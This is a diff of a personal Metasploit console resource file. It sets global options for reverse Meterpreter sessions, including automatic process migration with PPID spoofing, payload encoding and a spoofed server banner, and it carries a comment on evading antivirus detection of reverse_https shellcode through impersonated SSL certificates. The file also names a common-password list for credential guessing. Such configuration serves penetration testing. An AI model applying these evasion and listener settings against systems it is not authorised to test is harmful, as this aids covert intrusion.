ricardojba · February 26, 2024 22:54
diff --git a/msfconsole.rc b/msfconsole.rc
 set LogLevel 5
 set ConsoleLogging true
 set SessionLogging true
 set TimestampOutput true
 features set dns_feature true
 features set postgres_session_type true
 features set mssql_session_type true
 features set mysql_session_type true
 features set wrapped_tables true
 features set fully_interactive_shells true
 features set datastore_fallbacks true
 features set metasploit_payload_warnings true
 # features set defer_module_loads true
 features set hierarchical_search_table true
 # set HTTPTrace true
 # spool /home/vibrio/.msf4/all_output.txt
 # load sounds verbose=true
 # migrate and perform PPID Spoofing
 setg autorunscript post/windows/manage/migrate PPID_NAME="explorer.exe"
 setg PrependMigrate true
 setg VERBOSE true
 setg THREADS 50
 setg EXITFUNC thread
 setg ABORT_ON_LOCKOUT true
 setg cmdstager::ssl true
 setg MeterpreterServerName "Microsoft-HTTPAPI/2.0"
 setg EnableContextEncoding true
 setg EnableStageEncoding true
 setg ExitOnSession false
 # https://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/
 # Symantec and other detect the SSL certificate of the reverse_https shellcode.
 # Use auxiliary/gather/impersonate_ssl and then use the impersonated certificate on the reverse_https shellcode by using the options handlersslcert and stagerverifysslcert
 setg handlersslcert /home/vibrio/.msf4/loot/20210921081839_default_173.194.76.99_173.194.76.99_pe_946125.pem
 setg stagerverifysslcert true
 # set ReverseListenerBindAddress 192.168.1.1
 # set ReverseListenerBindPort 4444
 # set Proxies http:127.0.0.1:8080  # HTTP Proxy
 # set Proxies socks:127.0.0.1:9050 # SOCKS Proxy
 # set Proxies ni:192.168.1.1:3299  # SAP Router
 setg SHODAN_APIKEY foooooooooooooooooooooooooooo
 setg SRVHOST 0.0.0.0
 setg SRVPORT 5555
 setg LHOST 1.1.1.1
 setg LPORT 4444
 setg DB_ALL_PASS true
 setg DB_ALL_USER true
 setg USE_WINDOWS_AUTHENT false
 setg PASS_FILE ~/SecLists/Passwords/Common-Credentials/best1050.txt
 # db_connect -y ~/.msf4/database.yml
 # %D = Current local directory
 # %H = Host name
 # %J = Current number of jobs running
 # %L = Local IP
 # %S = Currently number of sessions open
 # %T = Timestamp
 # %U = Username
 set PROMPT %red[LHOST:%L]%whi[Workspace:%W]%blu[Jobs:%J]%grn[Sessions:%S]%yel[%D]
	set LogLevel 5
	set ConsoleLogging true
	set SessionLogging true
	set TimestampOutput true
	features set dns_feature true
	features set postgres_session_type true
	features set mssql_session_type true
	features set mysql_session_type true
	features set wrapped_tables true
	features set fully_interactive_shells true
	features set datastore_fallbacks true
	features set metasploit_payload_warnings true
	# features set defer_module_loads true
	features set hierarchical_search_table true
	# set HTTPTrace true
	# spool /home/vibrio/.msf4/all_output.txt
	# load sounds verbose=true
	# migrate and perform PPID Spoofing
	setg autorunscript post/windows/manage/migrate PPID_NAME="explorer.exe"
	setg PrependMigrate true
	setg VERBOSE true
	setg THREADS 50
	setg EXITFUNC thread
	setg ABORT_ON_LOCKOUT true
	setg cmdstager::ssl true
	setg MeterpreterServerName "Microsoft-HTTPAPI/2.0"
	setg EnableContextEncoding true
	setg EnableStageEncoding true
	setg ExitOnSession false
	# https://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/
	# Symantec and other detect the SSL certificate of the reverse_https shellcode.
	# Use auxiliary/gather/impersonate_ssl and then use the impersonated certificate on the reverse_https shellcode by using the options handlersslcert and stagerverifysslcert
	setg handlersslcert /home/vibrio/.msf4/loot/20210921081839_default_173.194.76.99_173.194.76.99_pe_946125.pem
	setg stagerverifysslcert true
	# set ReverseListenerBindAddress 192.168.1.1
	# set ReverseListenerBindPort 4444
	# set Proxies http:127.0.0.1:8080 # HTTP Proxy
	# set Proxies socks:127.0.0.1:9050 # SOCKS Proxy
	# set Proxies ni:192.168.1.1:3299 # SAP Router
	setg SHODAN_APIKEY foooooooooooooooooooooooooooo
	setg SRVHOST 0.0.0.0
	setg SRVPORT 5555
	setg LHOST 1.1.1.1
	setg LPORT 4444
	setg DB_ALL_PASS true
	setg DB_ALL_USER true
	setg USE_WINDOWS_AUTHENT false
	setg PASS_FILE ~/SecLists/Passwords/Common-Credentials/best1050.txt
	# db_connect -y ~/.msf4/database.yml
	# %D = Current local directory
	# %H = Host name
	# %J = Current number of jobs running
	# %L = Local IP
	# %S = Currently number of sessions open
	# %T = Timestamp
	# %U = Username
	set PROMPT %red[LHOST:%L]%whi[Workspace:%W]%blu[Jobs:%J]%grn[Sessions:%S]%yel[%D]